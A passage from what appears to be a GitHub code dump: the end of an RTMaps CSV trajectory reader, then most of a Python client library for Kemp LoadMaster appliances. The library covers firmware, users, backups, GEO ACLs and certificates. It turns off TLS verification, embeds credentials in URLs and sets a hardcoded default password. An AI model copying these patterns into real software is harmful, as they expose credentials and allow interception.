Geod\nimport csv\n\nlog = False\n\nclass rtmaps_python(BaseComponent):\n # constructeur de la classe\n def __init__(self):\n BaseComponent.__init__(self)\n\n # configuration des I/O\n def Dynamic(self):\n self.add_output(\"points_traj\", rtmaps.types.FLOAT64);\n self.add_property(\"path\", \"C:/Users/bolo.LAPTOP-0A1UK5DI/Documents/ESIG/S8/repo git/records/record1/trajectoryCise.csv\", rtmaps.types.FILE)\n self.add_property(\"recording\", False)\n\n # appel a la creation\n def Birth(self):\n print(\"starting...\");\n\n # called every input\n def Core(self):\n\n with open(self.properties[\"path\"].data) as csvDataFile: # open the cvs file\n data = [row for row in csv.reader(csvDataFile, delimiter=' ')] # put it into and array [row][column]\n x = len(data)\n\n for j in range(len(data)):\n out = data[j]\n print(out)\n self.outputs[\"points_traj\"].write([float(out[0]), float(out[1])])\n\n exit(0)\n\n\n\n # destroy\n def Death(self):\n print(\" Why did you kill me !?? :'(\");\n pass","repo_name":"Bol0/ESIGELEC_UTAC_1","sub_path":"modules_python/importUTMTraj.py","file_name":"importUTMTraj.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70881437210","text":"import logging\nimport os\nimport time\nimport subprocess\n\nfrom requests import exceptions\n\nfrom python_kemptech_api import utils\nfrom python_kemptech_api.api_xml import (\n get_data_field,\n is_successful,\n get_data,\n get_error_msg\n)\nfrom python_kemptech_api.capabilities import CAPABILITIES, DEFAULT\nfrom python_kemptech_api.exceptions import (\n LoadMasterParameterError,\n KempTechApiException,\n BackupFailed,\n CommandNotAvailableException,\n UserAlreadyExistsException,\n DownloadUserCertFailed,\n NotVirtualServiceInstanceError\n)\nfrom python_kemptech_api.generic import HttpClient, AccessInfoMixin\nfrom python_kemptech_api.objects import (\n VirtualService,\n CipherSet,\n Certificate,\n Sso,\n Rule,\n GlobalACL,\n Template,\n Fqdn,\n Cluster,\n Range,\n CustomLocation,\n Interface,\n IntermediateCertificate)\nfrom python_kemptech_api.utils import (\n send_response,\n validate_port,\n validate_ip,\n validate_protocol,\n get_api_bool_string,\n cast_to_list,\n get_dict_entry_as_list,\n get_sub_vs_list_from_data,\n build_object,\n list_object\n)\n\nlog = logging.getLogger(__name__)\n\n\nclass BaseKempAppliance(HttpClient, AccessInfoMixin):\n def __init__(self, ip, username=None, password=None, port=443, cert=None):\n self.ip_address = ip\n self.username = username\n self.password = password\n self.port = port\n self.cert = cert\n self.access_point = \"access\"\n self.version = None\n\n super(BaseKempAppliance, self).__init__(utils.DEFAULT_TLS_VERSION,\n self.cert)\n\n def __repr__(self):\n return '{}:{}'.format(self.ip_address, self.port)\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return self.version == other.version\n else:\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __gt__(self, other):\n if isinstance(other, self.__class__):\n return self.version > other.version\n else:\n return False\n\n def __lt__(self, other):\n if isinstance(other, self.__class__):\n return self.version < other.version\n else:\n return False\n\n def __ge__(self, other):\n if isinstance(other, self.__class__):\n return self.version >= other.version\n else:\n return False\n\n def __le__(self, other):\n if isinstance(other, self.__class__):\n return self.version <= other.version\n else:\n return False\n\n def _do_request_no_api(self, cmd):\n \"\"\"Perform a get in the context of enabling the API.\"\"\"\n url = \"https://{}:{}/{}\".format(self.ip_address, self.port, cmd)\n if self.cert:\n resp = self._tls_session.get(url, verify=False, timeout=1, cert=self.cert)\n else:\n resp = self._tls_session.get(url, verify=False, timeout=1,\n auth=(self.username, self.password))\n self._tls_session.close()\n return resp.status_code\n\n @property\n def endpoint(self):\n if self.cert:\n return \"https://{ip}:{port}/{access}\".format(\n ip=self.ip_address,\n port=self.port,\n access=self.access_point\n )\n else:\n return \"https://{user}:{pw}@{ip}:{port}/{access}\".format(\n user=self.username,\n pw=self.password,\n ip=self.ip_address,\n port=self.port,\n access=self.access_point\n )\n\n @property\n def capabilities(self):\n if self.version is None:\n self.version = \"7.1.34\"\n return CAPABILITIES.get(self.version, CAPABILITIES[DEFAULT])\n\n def _get_curl_command_list(self, command):\n \"\"\"\n Return a properly formatted curl command equivalent of the API call\n :param command:\n :return:\n \"\"\"\n curl = ['curl', '-s', '-k', '--connect-timeout', str(utils.TIMEOUT)]\n command = '{}/{}'.format(self.endpoint, command)\n if self.cert:\n curl.extend(['-E', self.cert])\n curl.append(command)\n return curl\n\n @property\n def license(self):\n \"\"\"Current license on the LoadMaster\n\n :return: License information\n \"\"\"\n response = self._get(\"/licenseinfo\")\n\n if is_successful(response):\n data = get_data(response)\n license_info = {}\n\n # Fix annoying API weirdness\n for k, v in data.items():\n k = k.lower()\n\n try:\n if v[0] == '\"':\n v = v[1:]\n\n if v[-1] == '\"':\n v = v[:-1]\n\n if v[-1] == \"\\n\":\n v = v[:-1]\n except (IndexError, KeyError):\n # Catch scenarios where there is no data\n pass\n\n if isinstance(v, str):\n v = v.replace(\" \", \" \")\n\n license_info[k] = v\n else:\n raise KempTechApiException(get_error_msg(response))\n\n return license_info\n\n @property\n def interfaces(self):\n \"\"\" Dictionary of named interfaces\n\n :return: Dict with interface name and Interface instance key / value pairs.\n \"\"\"\n return {interface.interface: interface\n for interface in self.get_interfaces()}\n\n def __getitem__(self, parameter):\n return self.get_parameter(parameter)\n\n def __setitem__(self, parameter, value):\n self.set_parameter(parameter, value)\n\n def set_parameter(self, parameter, value):\n \"\"\"Assign the value to the given loadmaster parameter\n\n :param parameter: A valid LoadMaster parameter.\n :type parameter: str.\n :param value: The value to be assigned\n :type value: str.\n :raises: LoadMasterParameterError\n \"\"\"\n parameters = {\n 'param': parameter,\n 'value': value,\n }\n\n response = self._get('/set', parameters)\n\n if not is_successful(response):\n raise LoadMasterParameterError(self, parameters)\n\n @property\n def acl(self):\n return self.get_global_acl()\n\n def get_global_acl(self):\n return GlobalACL(self.access_info)\n\n def get_parameter(self, parameter):\n \"\"\"Get the value of the given LoadMaster parameter\n\n :param parameter: A valid LoadMaster parameter.\n :type parameter: str.\n :return: str -- The parameter value\n \"\"\"\n parameters = {\n 'param': parameter,\n }\n response = self._get('/get', parameters)\n value = get_data_field(response, parameter)\n\n if isinstance(value, dict):\n # This hack converts possible HTML to an awful one string\n # disaster instead of returning parsed html as an OrderedDict.\n value = \"\".join(\"{!s}={!r}\".format(key, val) for (key, val) in\n sorted(value.items()))\n\n if parameter == \"version\":\n self.version = \".\".join(value.split(\".\")[:3])\n\n return value\n\n def get_all_parameters(self):\n \"\"\" Return all parameters as a dict with lowercase keys\n :return: A dict of all the parameters, with the keys in lowercase\n \"\"\"\n response = self._get(\"/getall\")\n data = get_data(response)\n return dict((k.lower(), v) for k, v in data.items())\n\n def enable_api(self, health_check_api=False):\n \"\"\" Enable LoadMaster RESTfull API\n\n This method will attempt to enable the LoadMaster's REST API the 'right' way\n by initially trying to set it with enableapi parameter. If this fails it will\n attempt to set it the old way using the progs URL.\n\n :param health_check_api: If True, an extra call to the API will be made\n to verify operability, only works for machines older\n than 7.2.36.\n :return: True if successfully enabled.\n \"\"\"\n # Can't use the HttpClient methods for this as the endpoint is different\n # (or has strict stipulations) when attempting to enable the API.\n try:\n status_code = self._do_request_no_api('access/set?param=enableapi&value=yes')\n if status_code == 404:\n self._do_request_no_api('progs/doconfig/enableapi/set/yes')\n status_code = self._do_request_no_api('progs/status/logout')\n if status_code != 200:\n raise KempTechApiException(code=status_code)\n if health_check_api:\n # Health check to see if API was actually enabled\n # if it failed its usually due to auth error so raise a 401\n status_code = self._do_request_no_api('access/get?param=version')\n if status_code != 200:\n raise KempTechApiException(code=401)\n elif status_code != 200:\n raise KempTechApiException(code=status_code)\n return True\n except exceptions.RequestException as e:\n raise KempTechApiException(msg=\"Enable API failed because of: {}\".format(\n e.__class__.__name__), is_xml_msg=False)\n\n def stats(self):\n response = self._get('/stats')\n return send_response(response)\n\n def update_firmware(self, file):\n response = self._post('/installpatch', file)\n self.version = None\n return is_successful(response)\n\n def restore_firmware(self):\n response = self._get(\"/restorepatch\")\n self.version = None\n return is_successful(response)\n\n def reset_logs(self):\n response = self._get(\"/logging/resetlogs\")\n return is_successful(response)\n\n def download_logs(self, filename=None):\n response = self._get(\"/logging/downloadlogs\")\n\n filename = filename or \"LoadMaster_\" + self.ip_address + \"_Logs.tgz\"\n\n with open(filename, 'w') as f:\n f.write(response)\n\n return filename\n\n def change_bal_password(self, new_password):\n parameters = {\n \"currpassword\": self.password,\n \"password\": new_password\n }\n\n response = self._get(\"/usersetsyspassword\", parameters=parameters)\n\n if is_successful(response):\n self.password = new_password\n return True\n else:\n return False\n\n def add_local_user(self, user, password=None, radius=False):\n params = {\n 'user': user,\n 'radius': get_api_bool_string(radius),\n }\n if password is None:\n params['nopass'] = 'y'\n else:\n params['password'] = password\n\n try:\n response = self._get('/useraddlocal', params)\n except KempTechApiException as e:\n if str(e) == \"User already exists.\":\n raise UserAlreadyExistsException(user, self.ip_address)\n else:\n raise\n return send_response(response)\n\n def delete_local_user(self, user):\n params = {'user': user}\n response = self._get('/userdellocal', params)\n return send_response(response)\n\n def set_user_perms(self, user, perms=None):\n perms = [] if perms is None else perms\n perms = cast_to_list(perms)\n params = {\n 'user': user,\n 'perms': \",\".join([perm for perm in perms]),\n }\n response = self._get('/usersetperms', params)\n return send_response(response)\n\n def new_user_cert(self, user):\n params = {'user': user}\n response = self._get('/usernewcert', params)\n return send_response(response)\n\n def download_user_cert(self, user, location=os.curdir):\n file_name = os.path.join(location, \"{}.cert\".format(user))\n\n with open(file_name, 'wb') as file:\n cmd = self._get_curl_command_list('userdownloadcert?user={}'\n .format(user))\n subprocess.call(cmd, stdout=file)\n file.seek(0, 2)\n if file.tell() == 0:\n raise DownloadUserCertFailed(self.ip_address)\n return file_name\n\n def shutdown(self):\n response = self._get('/shutdown')\n return is_successful(response)\n\n def reboot(self):\n response = self._get('/reboot')\n return is_successful(response)\n\n def get_license_info(self):\n try:\n response = self._get('360/licenseinfo')\n return send_response(response)\n\n except KempTechApiException:\n raise CommandNotAvailableException(\n self, '/access360/licenseinfo')\n\n def list_addons(self):\n response = self._get('/listaddon')\n return send_response(response)\n\n def get_diagnostic(self, diagnostic):\n response = self._get('/logging/{}'.format(diagnostic))\n return response\n\n def backup(self, location='backups'):\n if not os.path.exists(location):\n os.makedirs(location)\n file_name = os.path.join(location, \"{}_{}.backup\".format(\n self.ip_address, time.strftime(\"%Y-%m-%d_%H:%M:%S\")))\n\n with open(file_name, 'wb') as file:\n cmd = self._get_curl_command_list('backup')\n subprocess.call(cmd, stdout=file)\n file.seek(0, 2)\n if file.tell() == 0:\n raise BackupFailed(self.ip_address)\n return file_name\n\n def restore_backup(self, backup_type, file):\n # 1 LoadMaster Base Configuration\n # 2 Virtual Service Configuration\n # 3 GEO Configuration\n if backup_type not in [1, 2, 3]:\n backup_type = 2\n params = {\"type\": backup_type}\n response = self._post('/restore', file=file,\n parameters=params)\n return send_response(response)\n\n def alsi_license(self, kemp_id, password):\n params = {\n \"kempid\": kemp_id,\n \"password\": password,\n }\n response = self._get('/alsilicense', parameters=params)\n return send_response(response)\n\n def offline_license(self, license_file):\n response = self._post(\"/license\", file=license_file)\n return send_response(response)\n\n def set_initial_password(self, password):\n params = {\"passwd\": password}\n response = self._get('/set_initial_passwd', parameters=params)\n return send_response(response)\n\n def kill_asl_instance(self):\n response = self._get('/killaslinstance')\n return send_response(response)\n\n def get_interfaces(self):\n interfaces = []\n try:\n response = self._get('/showiface')\n data = get_data(response)\n interfaces_data = data.get('Interface', [])\n interfaces_data = cast_to_list(interfaces_data)\n for iface_data in interfaces_data:\n iface = build_object(Interface, self.access_info, iface_data)\n # Check for duplicate IPs as there is a bug in LoadMaster showiface\n # that makes unset interfaces inherit the previous interfaces IP.\n for interface in interfaces:\n if iface.addr == interface.addr:\n break\n else:\n interfaces.append(iface)\n return interfaces\n except KempTechApiException as e:\n # If showiface does not support listing of all interfaces (possibly due to\n # older version loadmasters) do it the hard way by doing it one by one getting\n # the IDs from /access/stats.\n # This will cause N+1 API calls to occur, N being the number of interfaces.\n if hasattr(e, \"status_code\") and e.status_code == 422:\n try:\n response = self._get('/stats')\n data = get_data(response)\n xml_object = data.get('Network', {})\n except KempTechApiException:\n xml_object = {}\n\n for k, v in xml_object.items():\n obj = self.get_interface(v['ifaceID'])\n obj.name = k\n interfaces.append(obj)\n return interfaces\n else:\n raise\n\n def get_interface(self, interface):\n response = self._get(\"/showiface\", {\"interface\": interface})\n xml_object = get_data(response)\n obj = build_object(Interface, self.access_info, xml_object)\n return obj\n\n def initial_license(self,\n license_type=None,\n callhome=None,\n new_password=None,\n kempid=None):\n\n self.get_eula()\n self.accept_eula(license_type)\n self.set_callhome(callhome)\n\n if kempid is not None:\n self.alsi_license(kempid['username'], kempid['password'])\n self.initial_password(new_password)\n else:\n raise KempTechApiException(\"Please license before proceeding.\")\n\n def get_eula(self):\n api = \"/readeula\"\n\n response = self._get(api)\n\n if is_successful(response):\n data = get_data(response)\n else:\n raise KempTechApiException(get_error_msg(response))\n\n self.magic = data['Magic']\n return data['Eula']\n\n def accept_eula(self, license_type=\"trial\"):\n api = \"/accepteula\"\n\n parameters = {\n \"type\": license_type,\n \"magic\": self.magic\n }\n\n response = self._get(api, parameters=parameters)\n\n if is_successful(response):\n data = get_data(response)\n else:\n raise KempTechApiException(get_error_msg(response))\n\n self.magic = data['Magic']\n\n def set_callhome(self, enabled=True):\n api = \"/accepteula2\"\n\n if enabled is True:\n enabled = \"yes\"\n else:\n enabled = \"no\"\n\n parameters = {\n \"accept\": enabled,\n \"magic\": self.magic\n }\n\n response = self._get(api, parameters=parameters)\n\n if not is_successful(response):\n raise KempTechApiException(get_error_msg(response))\n\n def initial_password(self, password=\"2fourall\"):\n api = \"/set_initial_passwd\"\n\n parameters = {\n \"passwd\": password\n }\n\n response = self._get(api, parameters=parameters)\n\n if not is_successful(response):\n raise KempTechApiException(get_error_msg(response))\n\n self.password = password\n\n def ping(self, host, interface=None):\n parameters = {\n \"addr\": host\n }\n\n if interface is not None:\n parameters['intf'] = interface\n\n try:\n response = self._get(\"/logging/ping\", parameters=parameters)\n except KempTechApiException:\n return False\n else:\n if \"connect: Network is unreachable\" in response:\n return False\n return True\n\n def refresh_dns(self):\n api = \"/resolvenow\"\n response = self._get(api)\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n\nclass Geo(BaseKempAppliance):\n \"\"\"GEO API object.\"\"\"\n _GEO_PARAMS = [\n \"sourceofauthority\",\n \"namesrv\",\n \"soaemail\",\n \"ttl\",\n \"persist\",\n \"checkinterval\",\n \"conntimeout\",\n \"retryattempts\"\n ]\n\n def __getitem__(self, parameter):\n if parameter.lower() in Geo._GEO_PARAMS:\n return self.get_geo_parameter(parameter)\n else:\n return self.get_parameter(parameter)\n\n def __setitem__(self, parameter, value):\n if parameter.lower() in Geo._GEO_PARAMS:\n self.set_geo_parameter(parameter, value)\n else:\n self.set_parameter(parameter, value)\n\n def set_geo_parameter(self, parameter, value):\n \"\"\"assign the value to the given loadmaster parameter\n\n :param parameter: a valid LoadMaster parameter.\n :type parameter: str.\n :param value: the value to be assigned\n :type value: str.\n :raises: LoadMasterParameterError\n \"\"\"\n parameters = {\n parameter: value\n }\n response = self._get('/modparams', parameters)\n if not is_successful(response):\n raise LoadMasterParameterError(self, parameters)\n\n def get_geo_parameter(self, parameter):\n \"\"\"get the value of the given GEO parameter\n\n :param parameter: a valid GEO parameter.\n :type parameter: str.\n :return: str -- the parameter value\n \"\"\"\n\n def _find_key_recursive(d, key):\n match = [k for k, v in d.items() if k.lower() == key.lower()]\n if match:\n return d[match.pop()]\n for v in d.values():\n if isinstance(v, dict):\n item = _find_key_recursive(v, key)\n if item is not None:\n return item\n\n response = self._get('/listparams')\n data = get_data(response)\n value = _find_key_recursive(data, parameter)\n return value\n\n def enable_geo(self):\n response = self._get('/enablegeo')\n return is_successful(response)\n\n def disable_geo(self):\n response = self._get('/disablegeo')\n return is_successful(response)\n\n @property\n def fqdns(self):\n return {fqdn.fqdn: fqdn for fqdn in self.get_fqdns()}\n\n @property\n def clusters(self):\n return {cluster.ip: cluster for cluster in self.get_clusters()}\n\n @property\n def ipranges(self):\n return {iprange.ip: iprange for iprange in self.get_ranges()}\n\n @property\n def customlocations(self):\n return {customlocation.name: customlocation\n for customlocation in self.get_customlocations()}\n\n def get_acl_settings(self):\n response = self._get(\"/geoacl/getsettings\")\n\n if is_successful(response):\n data = get_data(response)\n data = data['GeoAcl']\n else:\n raise KempTechApiException(get_error_msg(response))\n\n acl_settings = {}\n\n for k, v in data.items():\n if v == \"yes\":\n v = True\n elif v == \"no\":\n v = False\n elif v == \"Never\":\n v = None\n else:\n try:\n v = int(v) # pylint: disable=redefined-variable-type\n except ValueError:\n pass\n\n acl_settings[k.lower()] = v\n\n return acl_settings\n\n def set_acl_settings(self,\n autoupdate=None,\n autoinstall=None,\n installtime=None):\n if autoupdate is not None:\n command = \"setautoupdate\"\n key = \"enable\"\n value = autoupdate\n\n elif autoinstall is not None:\n command = \"setautoinstall\"\n key = \"enable\"\n value = autoinstall\n\n elif installtime is not None:\n command = \"setinstalltime\"\n key = \"hour\"\n value = autoinstall\n\n if value in [True, \"yes\", \"y\", \"1\"]:\n value = \"yes\"\n\n if value in [False, \"no\", \"n\", \"0\"]:\n value = \"no\"\n\n parameters = {\n key: value\n }\n\n response = self._get(\"/geoacl/{}\".format(command), parameters)\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n @property\n def acl_autoupdate(self):\n return self.get_acl_settings()['autoupdate']\n\n @acl_autoupdate.setter\n def acl_autoupdate(self, value):\n self.set_acl_settings(autoupdate=value)\n\n @property\n def acl_autoinstall(self):\n return self.get_acl_settings()['autoinstall']\n\n @acl_autoinstall.setter\n def acl_autoinstall(self, value):\n self.set_acl_settings(autoinstall=value)\n\n @property\n def acl_installtime(self):\n return self.get_acl_settings()['installtime']\n\n @acl_installtime.setter\n def acl_installtime(self, value):\n self.set_acl_settings(installtime=value)\n\n @property\n def acl_lastupdated(self):\n return self.get_acl_settings()['lastupdated']\n\n @property\n def acl_lastinstalled(self):\n return self.get_acl_settings()['lastinstalled']\n\n def acl_update(self):\n response = self._get(\"/geoacl/updatenow\")\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n def acl_install(self):\n response = self._get(\"/geoacl/installnow\")\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n @property\n def acl_download(self):\n response = self._get(\"/geoacl/downloadlist\")\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n return response\n\n @property\n def acl_changes(self):\n response = self._get(\"/geoacl/downloadchanges\")\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n return response\n\n def get_acl(self, type):\n parameters = {\n \"type\": type\n }\n response = self._get(\"/geoacl/listcustom\", parameters)\n\n if is_successful(response):\n data = get_data(response)\n else:\n raise KempTechApiException(get_error_msg(response))\n\n list_tag = \"{}list\".format(type).capitalize()\n\n acl_list = data[list_tag]\n\n if acl_list is None:\n acl_list = []\n elif isinstance(acl_list, dict):\n acl_list = acl_list.get('addr')\n\n if not isinstance(acl_list, list):\n acl_list = [acl_list]\n\n return acl_list\n\n def add_acl(self, type, value):\n parameters = {\n \"type\": type,\n \"addr\": value\n }\n\n response = self._get(\"/geoacl/addcustom\", parameters)\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n def remove_acl(self, type, value):\n parameters = {\n \"type\": type,\n \"addr\": value\n }\n\n response = self._get(\"/geoacl/removecustom\", parameters)\n\n if is_successful(response):\n pass\n else:\n raise KempTechApiException(get_error_msg(response))\n\n def set_acl(self, type, value):\n if not isinstance(value, list):\n raise ValueError(\"Setting ACL expects a list of IP networks\")\n\n current = self.get_acl(type)\n\n to_delete = list(set(current) - set(value))\n to_add = list(set(value) - set(current))\n\n for address in to_delete:\n self.remove_acl(type, address)\n\n for address in to_add:\n self.add_acl(type, address)\n\n @property\n def acl_whitelist(self):\n return self.get_acl(\"white\")\n\n @acl_whitelist.setter\n def acl_whitelist(self, value):\n self.set_acl(\"white\", value)\n\n @property\n def acl_blacklist(self):\n return self.get_acl(\"black\")\n\n @acl_blacklist.setter\n def acl_blacklist(self, value):\n self.set_acl(\"black\", value)\n\n def create_fqdn(self, fqdn):\n return Fqdn(self.access_info, fqdn)\n\n def get_fqdns(self):\n try:\n response = self._get(\"/listfqdns\")\n data = get_data(response)\n return list_object(Fqdn, self.access_info, data)\n except KempTechApiException:\n # If API returns 'No geo data found' return an empty list\n return []\n\n def get_fqdn(self, fqdn):\n service_id = {\n \"fqdn\": fqdn\n }\n\n # Append a . to the fqdn if it does not\n # exist as it is required for FQDN syntax\n if service_id['fqdn'][-1] != \".\":\n service_id['fqdn'] += \".\"\n\n response = self._get(\"/showfqdn\", service_id)\n data = get_data(response)\n fqdn = build_object(Fqdn, self.access_info, data)\n return fqdn\n\n def create_cluster(self, ip, name):\n \"\"\"Cluster factory with pre-configured LoadMaster connection.\"\"\"\n return Cluster(self.access_info, ip, name)\n\n def get_clusters(self):\n try:\n response = self._get(\"/listclusters\")\n data = get_data(response)\n clusters = data.get('cluster', [])\n except KempTechApiException:\n clusters = []\n\n cluster_list = []\n clusters = cast_to_list(clusters)\n for c in clusters:\n cluster = self.build_cluster(c)\n cluster_list.append(cluster)\n return cluster_list\n\n def get_cluster(self, ip):\n service_id = {\"ip\": ip}\n response = self._get(\"/showcluster\", service_id)\n data = get_data(response)\n cluster_data = data.get('cluster')\n # again line below will fail with ValidationError if empty response\n if not isinstance(cluster_data, dict):\n raise LoadMasterParameterError(\n \"Unexepected number of clusters returned\",\n cluster_data)\n cluster = self.build_cluster(cluster_data)\n return cluster\n\n def build_cluster(self, cluster):\n \"\"\"Create a Cluster instance with standard defaults\"\"\"\n cluster_object = Cluster(self.access_info,\n cluster.get('IPAddress'),\n cluster.get('Name'))\n cluster_object.populate_default_attributes(cluster)\n return cluster_object\n\n def create_range(self, ip, mask):\n \"\"\"Range factory with pre-configured LoadMaster connection.\"\"\"\n iprange = Range(self.access_info, ip, mask)\n return iprange\n\n def get_ranges(self):\n try:\n response = self._get(\"/listips\")\n data = get_data(response)\n ranges = data.get('IPAddress', [])\n except KempTechApiException:\n ranges = []\n\n range_list = []\n ranges = cast_to_list(ranges)\n for r in ranges:\n range = self.build_range(r)\n range_list.append(range)\n return range_list\n\n def get_range(self, ip):\n service_id = {\"ipaddress\": ip}\n response = self._get(\"/showip\", service_id)\n data = get_data(response)\n # again line below will fail with ValidationError if empty response\n range_data = data.get('cluster', {})\n if not isinstance(range_data, dict):\n raise LoadMasterParameterError(\n \"Unexepected number of ranges returned\", range_data)\n return self.build_range(range_data)\n\n def build_range(self, range):\n \"\"\"Create a Range instance with standard defaults\"\"\"\n range_object = Range(self.access_info,\n range.get('IPAddress'),\n range.get('Mask'))\n range_object.populate_default_attributes(range)\n return range_object\n\n def create_customlocation(self, name):\n \"\"\"CustomLocation factory with pre-configured LoadMaster connection.\"\"\"\n return CustomLocation(self.access_info, name)\n\n def get_customlocations(self):\n try:\n response = self._get(\"/listcustomlocation\")\n data = get_data(response)\n customlocations = data.get('location', [])\n except KempTechApiException:\n customlocations = []\n\n customlocation_list = []\n customlocations = cast_to_list(customlocations)\n for c in customlocations:\n customlocation = self.build_customlocation(c)\n customlocation_list.append(customlocation)\n return customlocation_list\n\n def get_customlocation(self, name):\n service_id = {\"name\": name}\n response = self._get(\"/listcustomlocation\", service_id)\n data = get_data(response)\n # again line below will fail with ValidationError if empty response\n customlocations_data = data.get('location', {})\n\n customlocation_data = [x for x in customlocations_data\n if x['Name'] == name]\n\n if not isinstance(customlocation_data, dict):\n raise LoadMasterParameterError(\n \"Unexepected number of custom locations returned\",\n customlocation_data)\n customlocation = self.build_range(customlocation_data)\n return customlocation\n\n def build_customlocation(self, customlocation):\n \"\"\"Create a Range instance with standard defaults\"\"\"\n customlocation_object = CustomLocation(\n self.access_info,\n customlocation.get('Name'))\n return customlocation_object\n\n\nclass LoadMaster(BaseKempAppliance):\n \"\"\"LoadMaster API object.\"\"\"\n\n @property\n def vs(self):\n return {int(vs.index): vs for vs in self.get_virtual_services()}\n\n @property\n def rules(self):\n return {rule.name: rule for rule in self.get_rules()}\n\n @property\n def sso(self):\n return {sso.name: sso for sso in self.get_ssos()}\n\n @property\n def templates(self):\n return {template.name: template for template in self.get_templates()}\n\n @property\n def certificates(self):\n return {certificate.certname: certificate for certificate in\n self.get_certificates()}\n\n def get_adaptive_parameters(self):\n response = self._get(\"/showadaptive\")\n data = get_data(response)\n\n return data['Data']\n\n def set_adaptive_parameters(self,\n adaptiveurl=None,\n adaptiveport=None,\n adaptiveinterval=None,\n minpercent=None):\n parameters = {}\n\n if adaptiveurl is not None:\n parameters['AdaptiveURL'] = adaptiveurl\n if adaptiveport is not None:\n validate_port(adaptiveport)\n parameters['AdaptivePort'] = adaptiveport\n if adaptiveinterval is not None:\n try:\n parameters['AdaptiveInterval'] = int(adaptiveinterval)\n except ValueError:\n raise LoadMasterParameterError(\n \"AdaptiveInterval specified is not an integer\",\n adaptiveinterval)\n if minpercent is not None:\n try:\n parameters['MinPercent'] = int(minpercent)\n except ValueError:\n raise LoadMasterParameterError(\n \"MinPercent specified is not an integer\",\n minpercent)\n\n response = self._get(\"/modadaptive\", parameters)\n\n if not is_successful(response):\n raise LoadMasterParameterError(self, parameters)\n\n def get_check_parameters(self):\n response = self._get(\"/showhealth\")\n data = get_data(response)\n formatted = {}\n\n for k, v in data.items():\n formatted[k.lower()] = int(v)\n\n return formatted\n\n def set_check_parameters(self,\n retryinterval=None,\n timeout=None,\n retrycount=None):\n parameters = {}\n if timeout is not None:\n try:\n parameters['Timeout'] = int(timeout)\n except ValueError:\n raise LoadMasterParameterError(\n \"Timeout specified is not an integer\",\n timeout)\n if retrycount is not None:\n try:\n parameters['RetryCount'] = int(retrycount)\n except ValueError:\n raise LoadMasterParameterError(\n \"RetryCount specified is not an integer\",\n retrycount)\n if retryinterval is not None:\n try:\n parameters['RetryInterval'] = int(retryinterval)\n except ValueError:\n raise LoadMasterParameterError(\n \"RetryInterval specified is not an integer\",\n retryinterval)\n\n response = self._get(\"/modhealth\", parameters)\n\n if not is_successful(response):\n raise LoadMasterParameterError(self, parameters)\n\n def create_sso(self, name):\n return Sso(self.access_info, name)\n\n def get_ssos(self):\n response = self._get(\"/showdomain\")\n ssos = get_data(response).get(\"Domain\") or []\n ssos_list = []\n\n # if there is no Rule key, build_virtual_services will fail with a\n # ValidationError, which is the best we can do for now\n # (without changing the upstream code and raising an exception earlier,\n # possibly retrying)\n if not isinstance(ssos, list):\n ssos = [ssos]\n for sso in ssos:\n sso_object = self.build_sso(sso)\n ssos_list.append(sso_object)\n return ssos_list\n\n def get_sso(self, name):\n service_id = {\"name\": name}\n response = self._get(\"/showdomain\", service_id)\n sso = get_data(response).get(\"Domain\")\n\n # again line below will fail with ValidationError if empty response\n sso_object = self.build_sso(sso)\n return sso_object\n\n def build_sso(self, sso):\n \"\"\"Create a Rule instance with standard defaults\"\"\"\n sso_object = Sso(self.access_info, sso.get('Name'))\n\n sso_object.populate_default_attributes(sso)\n return sso_object\n\n def create_rule(self, name, pattern):\n return Rule(self.access_info, name, pattern)\n\n def get_rules(self):\n response = self._get(\"/showrule\")\n data = get_data(response)\n rules_list = []\n\n for rule_type, rules in data.items():\n rules = cast_to_list(rules)\n for rule in rules:\n rule['type'] = rule_type\n rule_object = build_object(Rule, self.access_info, rule)\n rules_list.append(rule_object)\n\n return rules_list\n\n def get_rule(self, name):\n response = self._get(\"/showrule\", {\"name\": name})\n data = get_data(response)\n rules_list = []\n rule_object = None\n\n if len(data) > 1:\n raise KempTechApiException(\"Too many rules returned\")\n\n for rule_type, rules in data.items():\n rules = cast_to_list(rules)\n\n for rule in rules:\n rule['type'] = rule_type\n rule_object = build_object(Rule, self.access_info, rule)\n rules_list.append(rule_object)\n\n return rule_object\n\n def create_cipherset(self, cipherset_name, ciphers):\n cipherset = CipherSet(self.access_info, cipherset_name, ciphers)\n cipherset.save()\n\n def create_certificate(self, certificate, certfile, certpass=None):\n \"\"\"Certificate factory with pre-configured LoadMaster connection.\"\"\"\n cert = Certificate(self.access_info,\n certificate,\n certfile=certfile,\n certpass=certpass)\n return cert\n\n def create_intermediate_certificate(self, certificate, certfile):\n \"\"\"Certificate factory with pre-configured LoadMaster connection.\"\"\"\n cert = IntermediateCertificate(self.access_info,\n certificate,\n certfile=certfile)\n return cert\n\n def get_certificates(self, type='cert'):\n response = self._get(\"/listcert\")\n data = get_data(response)\n certificates = []\n certs = data.get('cert', [])\n if not isinstance(certs, list):\n certs = [certs]\n for cert in certs:\n certificate = self.build_certificate(cert)\n certificates.append(certificate)\n return certificates\n\n def get_intermediate_certificates(self, type='cert'):\n response = self._get(\"/listintermediate\")\n data = get_data(response)\n certificates = []\n certs = data.get('cert', [])\n if not isinstance(certs, list):\n certs = [certs]\n for cert in certs:\n certificate = self.build_intermediate_certificate(cert)\n certificates.append(certificate)\n return certificates\n\n def build_certificate(self, certificate, certfile=None,\n certpass=None):\n \"\"\"Create a Certificte instance named certificate\"\"\"\n if certfile is not None:\n cert = Certificate(self.access_info, certificate,\n certfile=certfile, certpass=certpass)\n else:\n cert = Certificate(self.access_info, certificate)\n return cert\n\n def build_intermediate_certificate(self, certificate, certfile=None):\n \"\"\"Create a Certificte instance named certificate\"\"\"\n if certfile is not None:\n cert = IntermediateCertificate(self.access_info,\n certificate,\n 